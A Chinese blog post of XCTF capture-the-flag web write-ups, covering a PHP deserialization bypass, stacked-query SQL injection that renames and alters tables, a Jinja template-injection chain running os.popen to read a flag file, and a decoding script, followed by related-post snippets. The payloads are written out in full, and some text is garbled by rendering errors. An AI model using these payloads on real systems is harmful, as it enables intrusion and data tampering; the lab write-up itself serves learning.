XCTF-web(五)

于 2025-04-21 13:09:29 发布
阅读量1k 收藏 27
点赞数 13
CC 4.0 BY-SA版权
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_52273419/article/details/147387719

Web_php_unserialize

在这里插入图片描述

当通过KaTeX parse error: Expected group after '_' at position 42: …erialize,触发魔术方法_̲_wakeup和__destr…this->file)输出文件内容,若KaTeX parse error: Expected group after '_' at position 17: …ile可控,可读取任意文件。 _̲_wakeup 防御:若file不为index.php,会被重置为index.php。可通过属性个数溢出绕过(序列化时声明的属性个数大于实际个数,__wakeup不会执行)。
正则检测:preg_match(‘/[oc]:\d+:/i’, $var)禁止包含o:或c:开头的序列化字符串。可利用NULL 字节截断让正则匹配失败(PHP 中preg_match遇到 NULL 字节会提前终止匹配)。

构造:/index.php?var=?TzorNDoiRGVtbyI6Mjp7czoxMDoiAERlbW8AZmlsZSI7czo4OiJmbDRnLnBocCI7fQ==

在这里插入图片描述

supersqli

在这里插入图片描述

看一下会输出什么

在这里插入图片描述

’1会报错

在这里插入图片描述

1’;show databases – #

在这里插入图片描述

1’;show tables – #

在这里插入图片描述

1’;show columns from 1919810931114514 – #

在这里插入图片描述

1’;rename tables words to words1;rename tables 1919810931114514 to words; alter table words change flag id varchar(100);-- #
1’ or 1=1 #

在这里插入图片描述

inget

在这里插入图片描述

?id=1’ or 1=1 – #

在这里插入图片描述

web2

在这里插入图片描述

对密文进行 str_rot13 还原:由于 str_rot13 是双向变换,再次应用即可还原。
反转字符串:逆转加密时最后一步的 strrev。
Base64 解码:解开加密时的 base64_encode。
字符 ord 减 1:逆转加密时每个字符 ord+1 的操作。
再次反转字符串:逆转加密时第一步的 strrev。

import base64
def python_decode(string):
    zimu = "abcdefghijklmnopqrstuvwxyz" 
    rot_13 ="" 
    for i in string: 
        if i.isdigit():
            rot_13 += i
        else:
            try:
                rot_13 += zimu[zimu.index(i)-13] 
            except:
                rot_13 += zimu[zimu.index(i.lower())-13].upper()
    fz = rot_13[::-1]
    base = base64.b64decode(fz)
    base = [chr(ord(i)-1) for i in base]
    fz = base[::-1]
    print "".join(fz)

python_decode("a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws")

结果:flag:{NSCTF_b73d5adfb819c64603d7237fa0d52977}

Web_python_template_injection

在这里插入图片描述

输入/{{7+7}},测试存在模板注入

在这里插入图片描述

/{{‘’.class}}

在这里插入图片描述

/{{‘’.class.mro}}

在这里插入图片描述

/{{‘’.class.base.base.subclasses()}}

在这里插入图片描述

/{{‘’.class.base.base.subclasses()[168]}}

在这里插入图片描述

/{{‘’.class.base.base.subclasses()[145].init.globals.builtins’eval’}}

在这里插入图片描述

/{{‘’.class.base.base.subclasses()[145].init.globals.builtins[‘eval’](‘import(“os”).popen(“cat fl4g”).read()’)}}

在这里插入图片描述

pencek
关注
XCTF-Web_php_unserialize
weixin_45613760的博客
08-14 482
题目 题目如下 可以看出来这是一道关于反序列化的题目 分析题目 看一下题目的代码 首先判断GET参数 “var” 是否存在,然后通过base64解码传入变量var,如果不存在就输出网页源码 对var进行一个正则过滤,如果通过正则过滤便会进行反序列化,否则响应信息’stop hacking!’ 题目中出现的魔术方法 题目中存在一个demo类 __contrust() 见名知意,构造方法。具有构造方法的类会在每次创建新对象前调用此方法 ,该方法常用于完成一些初始化工作。 __destruct() 析构方
6-XCTF-Web-unfinish(二次注入)
cquptcqupt的博客
08-17 429
这里写目录标题一、二级目录三级目录 一、 二级目录 三级目录
XCTF-高手进阶区:Web_php_unserialize(详解)
1stPeak's Blog
02-29 4059
代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_fi...
XCTF-攻防世界CTF平台-Web类——13、Web_php_unserialize(php反序列化漏洞绕过__wakeup()函数、正则表达式)
Onlyone_1314的博客
11-27 1297
打开题目地址: 这也是一个php反序列化的题目 源代码: <?php /** * 定义一个demo类 * / class Demo { # 初始化$file变量的默认值是index.php private $file = 'index.php'; # 类初始化的时候的构造函数,初始化当前对象的页面 public function __construct($file) { $this->file = $file; } # 对象销毁之前的析构函数,高
刚学php序列化/反序列化遇到的坑(攻防世界:Web_php_unserialize)
m0_46745664的博客
11-19 1264
攻防世界,Web_php_unserialize。
XCTF-Web-catcat-new
weixin_45723896的博客
06-26 3929
proc/self/mem是当前进程的内存内容,通过修改该文件相当于直接修改当前进程的内存数据。file=../../../../proc/self/cmdline,发现有一个通过python启动app.py的命令。通过/proc/PID可以访问对应PID的进程内核数据,而/proc/self访问的是当前进程的内核数据。先读取/proc/self/maps文件获取可读内容的内存映射地址。/proc/self/maps包含的内容是当前进程的内存映射关系,可通过读取该文件来得到内存数据映射的地址。
XCTF-WEB进阶-fakebook
最新发布
02-28
### XCTF WEB进阶 Fakebook 解题报告 #### 源码分析 Fakebook 类似于社交网络平台,在此环境中存在多个功能模块,包括但不限于用户注册、登录以及个人信息管理等功能。通过查看源代码发现,该应用可能存在多种安全...
XCTF-WEB-Web_php_include
Lorezon的博客
03-15 741
打开题目出现源码: <?php show_source(__FILE__); echo $_GET['hello']; $page=$_GET['page']; while (strstr($page, "php://")) { $page=str_replace("php://", "", $page); } include($page); ?> str函数对大小写敏感,考...
XCTF-2019-tfboys:XCTF 2019最终网络任务“ tfboys”的源代码
05-18
XCTF-2019-tfboys tfboys又名TensorFlow Boys 部署(Python3) pip install -r requirements.txt cd web3 python run.py 迪尔斯 web3/model/default/ : pre-trained LSTM model. exploit/exploit.ipynb : codes...
adworld.xctf-web-新手练习区刷题
BROTHERYY的博客
05-07 1154
1.View Source 根据题目,就能猜到,此处是查看页面源码,在查看的过程中发现右键不能使用了,那就用F12吧~ 2.Robots 这题是考察Robots协议,访问的时候页面是一片空白,直接输入robots.txt 在地址栏输入robots.txt会得到f1ag_1s_h3re.php,尝试直接访问这个php文件。 3.Backup 对常用的备份文件名进行测试*.php~ or ...
XCTF 攻防世界】WEB 高手进阶区 Web_php_unserialize
weixin_45844670的博客
08-22 454
题目是一段php代码 <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight_file($this->file, true); } function __wake
PHP反序列化+代码审计-xctf-Web_php_unserialize
qq_43660551的博客
07-01 919
php反序列化+代码审计
XCTF-WEB进阶区Web_php_unserialize
Lorezon的博客
03-15 603
打开题目是一堆源码: 主要看
XCTF-高手进阶区:unserialize3
1stPeak's Blog
06-24 4023
XCTF-高手进阶区-第六题:unserialize3 目标: 了解php反序列化中__wakeup漏洞的利用 了解php魔术方法 __construct(), __destruct(), __call(), __callStatic(), __get(), __set(), __isset(), __unset(), __sleep(), __wakeup(), __toStri...
[wp] 攻防世界 Web_php_unserialize
热门推荐
MercyLin的博客
09-22 3万+
先是一段代码审计: <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $file; } function __destruct() { echo @highlight...
攻防世界WEB进阶之unserialize3
harry_c的博客
08-01 1698
攻防世界WEB进阶之unserialize3第一步:分析第二步:实操第三步:答案 难度系数: 1星 题目来源: 暂无 题目描述:暂无 第一步:分析 题目仅仅给出了一个场景打开场景看到了如下内容: class xctf{ public $flag = ‘111’; public function __wakeup(){ exit(‘bad requests’); } ?code= 通过分析在浏览器地...
攻防世界xctf web Web_php_unserialize和warmup
weixin_45689999的博客
03-03 782
Web_php_unserialize 观察代码 题目需要绕过__wakeup和preg_match(’/[oc]:\d+:/i’, $var <?php class Demo { private $file = 'index.php'; public function __construct($file) { $this->file = $fil...
5.level5-[XCTF-Web_php_unserialize]-[+的利用]-[私有属性的序列化]-[base64编码]
qwsn
11-19 2430
0x01、Web 1.Web_php_unserialize 第一步:打开题目环境 图略 第二步:打开链接,发现一段php代码 图略 第三步:分析代码,撰写代码,生成payload 分析代码: <?php class Demo { #定义一个以Demo为名的类 private $file = 'index.php'; #给Demo类定义一个$file属性,并且赋值为index.php public function __construct($file) { #定
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值